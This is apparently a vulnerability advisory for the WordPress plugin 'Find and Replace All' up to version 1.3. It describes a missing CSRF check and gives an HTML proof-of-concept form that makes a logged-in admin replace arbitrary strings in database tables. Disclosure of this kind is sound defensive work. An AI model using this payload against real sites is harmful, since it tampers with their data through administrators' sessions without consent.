WordPress Plugin Vulnerabilities
Find and Replace All <= 1.3 - Arbitrary Replacement via CSRF
Description
The plugin does not have CSRF check when replacing string, which could allow attackers to make a logged admin replace arbitrary string in database tables via a CSRF attack
Proof of Concept
Make a logged in admin open a page with the below code <html> <body> <form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST"> <input type="hidden" name="findstr" value="Str-To-Replace" /> <input type="hidden" name="replacestr" value="Replaced-via-CSRF"> <input type="hidden" name="submit" value="Replace Now" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
Fixed in version 1.3 - plugin closed
References
Classification
Miscellaneous
Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
Timeline
Publicly Published
2022-11-03 (about 4 months ago)
Added
2022-11-03 (about 4 months ago)
Last Updated
2022-11-03 (about 4 months ago)